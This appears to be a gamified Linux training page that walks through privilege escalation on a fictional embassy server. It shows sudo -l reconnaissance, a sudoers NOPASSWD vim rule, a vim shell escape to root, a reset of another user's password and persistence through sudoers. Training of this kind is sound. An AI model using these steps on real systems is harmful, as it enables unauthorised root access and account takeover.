Access Control
Escalate privileges. Become root. Control the system.
CLASSIFIED SCENARIO
You've infiltrated the embassy's network server but your access is limited. The ambassador's classified communications are in /root/diplomatic_cables/. Your mission: escalate privileges to root access, examine the sudoers configuration, and extract the classified data. Remember - with great power comes great audit trails.
Why Access Control Matters
Privilege escalation is the holy grail of system compromise. Understanding access control enables:
- Privilege escalation - Gain root from limited user access
- Persistence - Add yourself to sudoers for future access
- Lateral movement - Use elevated access to reach other systems
- Defense - Understand how attackers escalate to protect systems
- Audit - Identify misconfigured sudo rules
Privilege Escalation Vectors
- NOPASSWD sudo rules - Execute commands without password
- Misconfigured sudoers - Wild cards, dangerous commands
- SUID binaries - Programs that run as root
- Writable /etc/passwd - Add root-level user
- Kernel exploits - Dirty COW, etc. (out of scope)
Core Access Commands
sudo
Execute commands as root (or another user). The gateway to privilege.
su
Switch user. Become root or another user entirely.
visudo
Safely edit /etc/sudoers. Syntax checking prevents lockouts.
passwd
Change passwords. As root, change any user's password.
Command Deep Dive
sudo -l - Check Your Powers
$ sudo -l
Matching Defaults entries for operator on embassy-srv:
env_reset, mail_badpass
User operator may run the following commands on embassy-srv:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/less
[PRIVESC] NOPASSWD vim = shell escape to root!
[VECTOR] vim -> :!/bin/bash -> root shell
su - Switch User
$ su -
Password:
root@embassy-srv:~# whoami
root
[ESCALATED] Now running as root
[CAUTION] All commands logged to auth.log
Sudoers File Structure
# cat /etc/sudoers
# User privilege specification
root ALL=(ALL:ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Operator can run specific commands without password
operator ALL=(root) NOPASSWD: /usr/bin/vim, /usr/bin/less
[DANGEROUS] vim and less allow shell escapes!
[EXPLOIT] sudo vim -> :!bash -> root
passwd - Control Access
root@embassy-srv:# passwd ambassador
New password:
Retype new password:
passwd: password updated successfully
[CHANGED] Ambassador's password reset
[ACCESS] Can now login as ambassador
Quick Reference
| Command | Purpose | Notes |
|---|---|---|
sudo -l | List your sudo privileges | First recon step |
sudo command | Run as root | Requires password usually |
sudo -u user cmd | Run as specific user | Lateral movement |
su - | Become root | Needs root password |
su - user | Become specific user | Needs that user's password |
visudo | Edit sudoers safely | Syntax validation |
Privilege Escalation via vim
# === CLASSIC VIM ESCAPE ===
$ sudo -l # Check: (root) NOPASSWD: vim
$ sudo vim # Open vim as root
:!bash # In vim: escape to shell
root@embassy-srv:# id # Confirm root access
uid=0(root) gid=0(root) groups=0(root)
[SUCCESS] Escalated to root via vim shell escape
Ready to Escalate?
Test your privilege escalation skills, then infiltrate the embassy.